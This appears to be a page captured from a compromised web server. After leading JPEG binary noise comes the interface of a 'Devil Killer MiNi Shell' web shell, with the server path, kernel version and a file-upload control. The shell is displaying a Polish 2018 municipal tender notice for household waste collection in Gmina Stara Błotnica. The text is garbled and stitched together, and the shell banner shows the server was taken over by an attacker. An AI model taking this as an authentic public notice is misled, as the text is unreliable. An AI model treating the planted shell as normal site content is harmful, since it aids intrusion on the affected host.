JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20181116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20181116/649380-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 649380-N-2018 z dnia 2018-11-16 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Stara Błotnica</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Stara Błotnica</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Stara Błotnica</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">67022401900000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Stara Błotnica</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">46</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">26806 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Stara Błotnica</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">48 385-77-90</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">przetargi@starablotnica.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">48 383-50-92</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.starablotnica.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://www.starablotnica.bip.org.pl </span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferta musi być sporządzona w języku polskim, w 1 egzemplarzu, mieć formę pisemną.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Gminy Stara Błotnica, Stara Błotnica 46, pokój nr 1 26-806 Stara Błotnica </span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Stara Błotnica</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">B.271.5.2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest usługa polegająca na odbiorze i zagospodarowaniu odpadów komunalnych powstających w nieruchomościach, na których zamieszkują mieszkańcy, na terenie Gminy Stara Błotnica, wyposażenie tych nieruchomości w worki do zbiórki odpadów zmieszanych oraz segregowanych. Do obowiązków wykonawcy należy także wyposażenie i prowadzenie punktu selektywnego zbierania odpadów komunalnych, zgodnie z obowiązującymi przepisami, zapewniając jego funkcjonowanie 2 razy w miesiącu. Wykonawca będzie miał obowiązek przeprowadzenia objazdowych zbiórek (,,od domu do domu") odpadów wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego oraz zużytych opon.I. SZCZEGÓŁOWE OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA1. Określenie przedmiotu zamówienia.1.1 Przedmiot zamówienia obejmuje:1) odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy, położonych na terenie Gminy Stara Błotnica, w okresie od 01 stycznia do 31 grudnia 2019 roku, w tym:a)	każdej ilości niesegregowanych (zmieszanych) odpadów komunalnych sprzed nieruchomości mieszkańców;b)	każdej ilości selektywnie zgromadzonych odpadów komunalnych sprzed nieruchomości mieszkańców w podziale na następujące frakcje:- papier i tektura wraz z opakowaniami wielomateriałowymi;- szkło i opakowania szklane;- tworzywa sztuczne;- metale;- odpady zielone i bioodpady;c) każdej ilości odpadów komunalnych dostarczonych przez mieszkańców do Punktu Selektywnej Zbiórki Odpadów Komunalnych, zlokalizowanego w miejscowości Czyżówka 42 - plac przy Oczyszczalni Ścieków, w podziale na następujące frakcje: - papier i tektura wraz z opakowaniami wielomateriałowymi; - metale; - tworzywa sztuczne; - szkło i opakowania szklane; - meble i inne odpady wielkogabarytowe; - zużyty sprzęt elektryczny i elektroniczny; - odpady budowlane i rozbiórkowe; - zużyte opony; - odpady niebezpieczne (chemikalia, opakowania po środkach ochrony roślin, przeterminowane lekarstwa, świetlówki, baterie i akumulatory, itp.); - tekstylia i odzież; - odpady zielone; - popiół i żużel.2) odbiór i zagospodarowanie odpadów o następujących kodach: KODODPADU NAZWA ODPADU10 01 01	Żużle, popioły paleniskowe i pyły z kotłów (z wyłączeniem pyłów z kotłów wymienionych w 10 01 04)15 01 01	Opakowania z papieru i tektury15 01 02	Opakowania z tworzyw sztucznych15 01 03	Opakowania z drewna15 01 04	Opakowania z metali15 01 05	Opakowania wielomateriałowe15 01 06	Zmieszane odpady opakowaniowe15 01 07	Opakowania ze szkła15 01 09	Opakowania z tekstyliów15 01 10*	Opakowania zawierające pozostałości substancji niebezpiecznych lub nimi zanieczyszczone15 01 11*	Opakowania z metali zawierające niebezpieczne porowate elementy wzmocnienia konstrukcyjnego (np. azbest), włącznie z pustymi pojemnikami ciśnieniowymi16 01 03	Zużyte opony17 01 01	Odpady betonu oraz gruz betonowy z rozbiórek i remontów17 01 02	Gruz ceglany17 01 03	Odpady innych materiałów ceramicznych i elementów wyposażenia17 01 07	Zmieszane odpady z betonu, gruzu ceglanego, odpadowych materiałów ceramicznych i elementów wyposażenia inne niż wymienione w 17 01 0617 01 80	Usunięte tynki, tapety, okleiny itp.17 01 82	Inne nie wymienione odpady17 02 01	Drewno17 02 02 Szkło17 02 03	Tworzywa sztuczne17 03 80	Odpadowa papa17 04 01	Miedź, brąz, mosiądz17 04 02	Aluminium17 04 03	Ołów17 04 04	Cynk17 04 05	Żelazo i stal17 04 06	Cyna17 04 07	Mieszaniny metali17 04 11	Kable i inne nie wymienione w 17 04 1017 06 04	Materiały izolacyjne inne niż wymienione w 17 06 01 i 17 06 0317 08 02	Materiały budowlane zawierające gips inne niż wymienione w 17 08 0117 09 04	Zmieszane odpady z budowy, remontów i demontażu inne niż wymienione w 17 09 01, 17 09 02 i 17 09 0320 01 01	Papier i tektura20 01 02	Szkło20 01 10	Odzież20 01 11	Tekstylia20 01 13*	Rozpuszczalniki20 01 14*	Kwasy20 01 15*	Alkalia 20 01 17*	Odczynniki fotograficzne20 01 19*	Środki ochrony roślin20 01 21*	Lampy fluorescencyjne i inne odpady zawierające rteć20 01 23*	Urządzenia zawierające freony20 01 25	Oleje i tłuszcze jadalne20 01 26*	Oleje i tłuszcze inne niż wymienione w 20 01 2520 01 27*	Farby, tusze, farby drukarskie, kleje, lepiszcze i żywice zawierające substancje niebezpieczne20 01 28	Farby, tusze, farby drukarskie, kleje, lepiszcze i żywice inne niż wymienione w 20 01 2720 01 29*	Detergenty zawierające substancje niebezpieczne20 01 30	Detergenty inne niż wymienione w 20 01 2920 01 31*	Leki cytoksyczne i cytostatyczne20 01 32	Leki inne niż wymienione w 20 01 3120 01 33*	Baterie i akumulatory łącznie z bateriami i akumulatorami wymienionymi w 16 06 01, 10 06 02 lub 10 06 03 oraz niesortowalne baterie i akumulatory zawierające te baterie20 01 34	Baterie i akumulatory inne niż wymienione w 20 01 3320 01 35*	Zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21 i 20 01 23 zawierające niebezpieczne składniki20 01 36	Zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21, 20 01 23 i 20 01 3520 01 37*	Drewno zawierające substancje niebezpieczne20 01 38	Drewno inne niż wymienione w 20 01 3720 01 39	Tworzywa sztuczne20 01 40	Metale20 01 80	Środki ochrony roślin inne niż wymienione w 20 01 1920 01 99	Inne nie wymienione frakcje zbierane w sposób selektywny20 02 01	Odpady ulegające biodegradacji20 02 02	Gleba i ziemia, w tym kamienie20 03 01	Niesegregowane (zmieszane ) odpady komunalne20 03 07	Odpady wielkogabarytowe20 03 99	Odpady komunalne niewymienione w innych podgrupach3) wyposażenie właścicieli nieruchomości zamieszkałych, położonych na terenie Gminy Stara Błotnica, w worki do zbiórki odpadów komunalnych gromadzonych w sposób zmieszany i selektywny na czas trwania umowy;4) wyposażenie w pojemniki i kontenery Punktu Selektywnej Zbiórki Odpadów Komunalnych, w taki sposób aby zagwarantować możliwość selektywnej zbiórki i zapobiec gromadzeniu odpadów w miejscu do tego nieprzeznaczonym;5) prowadzenie Punktu Selektywnej Zbiórki Odpadów Komunalnych, zapewniając jego funkcjonowanie 2 razy w miesiącu;6) ustalenie z Zamawiającym harmonogramu odbioru odpadów komunalnych gromadzonych w sposób zmieszany i selektywny z nieruchomości zamieszkałych znajdujących się na terenie Gminy Stara Błotnica;7) ustalenie z Zamawiającym harmonogramu funkcjonowania Punktu Zbiórki Odpadów Komunalnych;8) prowadzenie objazdowych zbiórek (,, od domu do domu") odpadów wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego oraz zużytych opon - 2 razy w roku (preferowane miesiące to kwiecień i październik).2. Szczegółowe uwarunkowania zamówienia.2.1. Wykonawca jest zobowiązany do odbierania odpadów komunalnych:1) w sposób ciągły, nie zakłócający spoczynku nocnego,2) w terminach i z częstotliwością wynikającą z przyjętego harmonogramu odbioru,3) niezależnie od warunków atmosferycznych,4) pojazdami przystosowanymi do odbierania poszczególnych frakcji, w sposób zapewniający zachowanie segregacji,5) w sposób sprawny, gwarantujący bezpieczeństwo ruchu drogowego, ograniczający do minimum utrudnienia w ruchu drogowym, w korzystaniu z nieruchomości, z uwzględnieniem zabezpieczenia przewożonych odpadów przed pyleniem i rozsypywaniem.2.2. Wykonawca odbiera i transportuje odpady, również w przypadkach, kiedy dojazd do punktów gromadzenia odpadów jest utrudniony z powodu prowadzonych remontów dróg itp. Trasy zbiórki przebiegają po drogach wojewódzkich, powiatowych, gminnych a także wewnętrznych drogach wiejskich, gruntowych. Niektóre posesje są znacznie oddalone od centrów wsi, ( 77 posesji w 2018 roku) zwłaszcza zimą i jesienią do niektórych miejsc utrudniony jest dojazd. Wykonawca musi dysponować na tę okoliczność mniejszym samochodem umożliwiającym odbiór odpadów zgodnie z harmonogramem.2.3. W razie awarii pojazdu Wykonawca jest zobowiązany do zapewnienia pojazdu zastępczego.2.4. Wykonawca zapewnia przez cały okres realizacji zamówienia:1) system monitorowania pracy sprzętu obejmujący bieżące śledzenie pozycji pojazdów w oparciu o wykorzystanie systemu GPS i komunikowanie się z nim w dowolnym momencie w celu odczytu ww. danych;2) dostęp Zamawiającemu do zapisów pozwalających odtworzyć historię pracy sprzętu wraz z podaniem konkretnych adresów odbioru.2.5. Wykonawca ma obowiązek porządkowania terenu w miejscu wystawienia worków z odpadami komunalnymi w przypadku jego zanieczyszczenia wynikającego z uszkodzenia worka. Wykonawca zobowiązuje się do odbioru z miejsc wystawienia worków ewentualnych rozsypanych oraz luźnych odpadów (np. odpady rozrzucone przez zwierzęta).2.6. Wykonawca odbiera odpady wystawione przez mieszkańców w dostępnym miejscu: przed posesją, na podjeździe, przy drodze publicznej.2.7. Wykonawca zobowiązany jest do kontroli realizowania przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpadów komunalnych. W sytuacji stwierdzenia braku segregacji lub jej niewłaściwego wykonania Wykonawca zobowiązany jest odebrać odpady jako odpady zmieszane komunalne. Przed zabraniem Wykonawca sporządza dokumentację fotograficzną lub inną, która potwierdza jego zastrzeżenia. W przypadku gdy Wykonawca stwierdzi, iż w worku przeznaczonym do selektywnej zbiórki znajdują się odpady inne niż podlegające segregacji lub mieszkaniec przekazał do odbioru błędnie zakwalifikowany odpad, wówczas Wykonawca zobowiązany jest do oznaczenia worka lub tego przedmiotu informacją ,,nieprawidłowo posegregowane" np., w postaci naklejki wykonanej przez Wykonawcę i sporządzenia dokumentacji fotograficznej potwierdzającej jego zastrzeżenia. O powyższej sytuacji powiadamia Zamawiającego w formie pisemnej wraz z dołączoną dokumentacją fotograficzną w terminie 2 dni roboczych. Dopuszcza się formę elektroniczną.2.8. Wykonawca ma obowiązek odbierania zmieszanych odpadów komunalnych gromadzonych w pojemnikach będących własnością właściciela nieruchomości, jeżeli spełniają odpowiednie normy i umożliwiają odbiór odpadów sprzętem, którym dysponuje Wykonawca.2.9. Wykonawca ma obowiązek odbierania odpadów selektywnie gromadzonych w workach będących własnością właścicieli nieruchomości (niezależnie od koloru worka). Jeżeli umożliwiają identyfikację rodzaju zgromadzonego odpadu.2.10. Wykonawca jest zobowiązany do naprawienia szkód wyrządzonych podczas lub w związku z wykonywaniem przedmiotu zamówienia. Wykonawca ponosi pełną odpowiedzialność wobec Zamawiającego i osób trzecich za szkody na mieniu lub zdrowiu osób trzecich, powstałe podczas lub w związku z realizacją przedmiotu zamówienia.2.11. Wykonawca jest zobowiązany, aby w trakcie odbioru odpadów komunalnych realizowanych na rzecz Zamawiającego nie odbierać jednocześnie odpadów komunalnych z nieruchomości niezamieszkałych, które nie są objęte gminnym systemem gospodarowania odpadami.2.12. Wykonawca zobowiązany jest do przekazywania odebranych, zmieszanych odpadów komunalnych, odpadów zielonych do regionalnej instalacji do przetwarzania odpadów komunalnych, właściwej dla radomskiego regionu gospodarki odpadami zgodnie z Wojewódzkim Planem Gospodarki Odpadami. W przypadku selektywnie zebranych odpadów komunalnych, w ramach zagospodarowania odpadów, zobowiązany jest do ich przekazania do instalacji odzysku i unieszkodliwiania, zgodnie z hierarchią postępowania z odpadami, o której mowa w ustawie z dnia 14 grudnia 2012 roku o odpadach, z późniejszymi zmianami.2.13. Wykonawca ma obowiązek zagospodarować odebrane odpady komunalne w sposób umożliwiający osiągnięcie określonych:1)- w Rozporządzeniu Ministra Środowiska 14 grudnia 2016 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz.U. z 2016 r. poz. 2167), poziomów recyklingu, przygotowani do ponownego użycia i odzysku frakcji odpadów:a) papier, metal, tworzywa sztuczne, szkło:- w roku 2019 - co najmniej 30%;b) inne niż niebezpieczne odpady budowlane i rozbiórkowe:- w roku 2019 - co 